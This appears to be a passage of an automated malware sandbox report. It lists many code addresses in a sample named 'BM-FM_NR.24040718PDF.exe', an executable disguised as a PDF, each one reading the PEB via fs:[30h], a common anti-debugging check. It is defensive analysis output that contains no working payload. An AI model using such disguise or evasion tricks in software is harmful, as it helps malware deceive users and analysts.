Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov ecx, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov ecx, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB502 mov eax, dword ptr fs:[00000030h] 2_2_36ADB502
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h] 2_2_36B9550D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h] 2_2_36B9550D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h] 2_2_36B9550D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B69567 mov eax, dword ptr fs:[00000030h] 2_2_36B69567
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9B56E mov eax, dword ptr fs:[00000030h] 2_2_36B9B56E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9B56E mov ecx, dword ptr fs:[00000030h] 2_2_36B9B56E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9B56E mov eax, dword ptr fs:[00000030h] 2_2_36B9B56E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB55F mov eax, dword ptr fs:[00000030h] 2_2_36BBB55F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB55F mov eax, dword ptr fs:[00000030h] 2_2_36BBB55F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD92AF mov eax, dword ptr fs:[00000030h] 2_2_36AD92AF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h] 2_2_36BBB2BC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h] 2_2_36BBB2BC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h] 2_2_36BBB2BC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h] 2_2_36BBB2BC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA92AB mov eax, dword ptr fs:[00000030h] 2_2_36BA92AB
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F2AE mov eax, dword ptr fs:[00000030h] 2_2_36B9F2AE
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h] 2_2_36AE7290
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h] 2_2_36AE7290
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h] 2_2_36AE7290
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADD2EC mov eax, dword ptr fs:[00000030h] 2_2_36ADD2EC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADD2EC mov eax, dword ptr fs:[00000030h] 2_2_36ADD2EC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD72E0 mov eax, dword ptr fs:[00000030h] 2_2_36AD72E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h] 2_2_36B832DF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h] 2_2_36B832DF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h] 2_2_36B832DF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h] 2_2_36B832DF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h] 2_2_36B832DF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B132C0 mov eax, dword ptr fs:[00000030h] 2_2_36B132C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B132C0 mov eax, dword ptr fs:[00000030h] 2_2_36B132C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB32C9 mov eax, dword ptr fs:[00000030h] 2_2_36BB32C9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B032C5 mov eax, dword ptr fs:[00000030h] 2_2_36B032C5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6B214 mov eax, dword ptr fs:[00000030h] 2_2_36B6B214
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6B214 mov eax, dword ptr fs:[00000030h] 2_2_36B6B214
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9D270 mov eax, dword ptr fs:[00000030h] 2_2_36B9D270
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h] 2_2_36ADB273
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h] 2_2_36ADB273
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h] 2_2_36ADB273
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5D250 mov eax, dword ptr fs:[00000030h] 2_2_36B5D250
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5D250 mov ecx, dword ptr fs:[00000030h] 2_2_36B5D250
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h] 2_2_36BA124C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h] 2_2_36BA124C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h] 2_2_36BA124C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h] 2_2_36BA124C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F24A mov eax, dword ptr fs:[00000030h] 2_2_36B0F24A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F247 mov eax, dword ptr fs:[00000030h] 2_2_36B9F247
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE93A6 mov eax, dword ptr fs:[00000030h] 2_2_36AE93A6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE93A6 mov eax, dword ptr fs:[00000030h] 2_2_36AE93A6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B81390 mov eax, dword ptr fs:[00000030h] 2_2_36B81390
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B81390 mov eax, dword ptr fs:[00000030h] 2_2_36B81390
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h] 2_2_36AE1380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h] 2_2_36AE1380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h] 2_2_36AE1380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h] 2_2_36AE1380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h] 2_2_36AE1380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F38A mov eax, dword ptr fs:[00000030h] 2_2_36B9F38A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B133D0 mov eax, dword ptr fs:[00000030h] 2_2_36B133D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9D330 mov eax, dword ptr fs:[00000030h] 2_2_36B9D330
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9D330 mov eax, dword ptr fs:[00000030h] 2_2_36B9D330
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB3336 mov eax, dword ptr fs:[00000030h] 2_2_36BB3336
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0332D mov eax, dword ptr fs:[00000030h] 2_2_36B0332D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD9303 mov eax, dword ptr fs:[00000030h] 2_2_36AD9303
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD9303 mov eax, dword ptr fs:[00000030h] 2_2_36AD9303
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F30A mov eax, dword ptr fs:[00000030h] 2_2_36B9F30A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h] 2_2_36B6330C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h] 2_2_36B6330C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h] 2_2_36B6330C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h] 2_2_36B6330C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB50B7 mov eax, dword ptr fs:[00000030h] 2_2_36BB50B7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9B0AF mov eax, dword ptr fs:[00000030h] 2_2_36B9B0AF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B67090 mov eax, dword ptr fs:[00000030h] 2_2_36B67090
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1D0F0 mov eax, dword ptr fs:[00000030h] 2_2_36B1D0F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1D0F0 mov ecx, dword ptr fs:[00000030h] 2_2_36B1D0F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h] 2_2_36AD90F8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h] 2_2_36AD90F8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h] 2_2_36AD90F8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h] 2_2_36AD90F8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h] 2_2_36B8B0D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h] 2_2_36B8B0D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h] 2_2_36B8B0D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h] 2_2_36ADB0D6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h] 2_2_36ADB0D6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h] 2_2_36ADB0D6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h] 2_2_36ADB0D6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFB0D0 mov eax, dword ptr fs:[00000030h] 2_2_36AFB0D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADD02D mov eax, dword ptr fs:[00000030h] 2_2_36ADD02D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B87030 mov eax, dword ptr fs:[00000030h] 2_2_36B87030
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B05004 mov eax, dword ptr fs:[00000030h] 2_2_36B05004
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B05004 mov ecx, dword ptr fs:[00000030h] 2_2_36B05004
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB1076 mov eax, dword ptr fs:[00000030h] 2_2_36BB1076
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB1076 mov eax, dword ptr fs:[00000030h] 2_2_36BB1076
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B89060 mov eax, dword ptr fs:[00000030h] 2_2_36B89060
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE7072 mov eax, dword ptr fs:[00000030h] 2_2_36AE7072
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB505B mov eax, dword ptr fs:[00000030h] 2_2_36BB505B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1051 mov eax, dword ptr fs:[00000030h] 2_2_36AE1051
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1051 mov eax, dword ptr fs:[00000030h] 2_2_36AE1051
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB51B6 mov eax, dword ptr fs:[00000030h] 2_2_36BB51B6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B131BE mov eax, dword ptr fs:[00000030h] 2_2_36B131BE
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B131BE mov eax, dword ptr fs:[00000030h] 2_2_36B131BE
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21190 mov eax, dword ptr fs:[00000030h] 2_2_36B21190
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21190 mov eax, dword ptr fs:[00000030h] 2_2_36B21190
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B09194 mov eax, dword ptr fs:[00000030h] 2_2_36B09194
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F1F0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F1F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F1F0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F1F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7D1F0 mov eax, dword ptr fs:[00000030h] 2_2_36B7D1F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE91E5 mov eax, dword ptr fs:[00000030h] 2_2_36AE91E5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE91E5 mov eax, dword ptr fs:[00000030h] 2_2_36AE91E5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD91F0 mov eax, dword ptr fs:[00000030h] 2_2_36AD91F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD91F0 mov eax, dword ptr fs:[00000030h] 2_2_36AD91F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h] 2_2_36AF51C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h] 2_2_36AF51C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h] 2_2_36AF51C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h] 2_2_36AF51C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F13E mov eax, dword ptr fs:[00000030h] 2_2_36B9F13E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB3136 mov eax, dword ptr fs:[00000030h] 2_2_36BB3136
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B17128 mov eax, dword ptr fs:[00000030h] 2_2_36B17128
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B17128 mov eax, dword ptr fs:[00000030h] 2_2_36B17128
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE510D mov eax, dword ptr fs:[00000030h] 2_2_36AE510D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
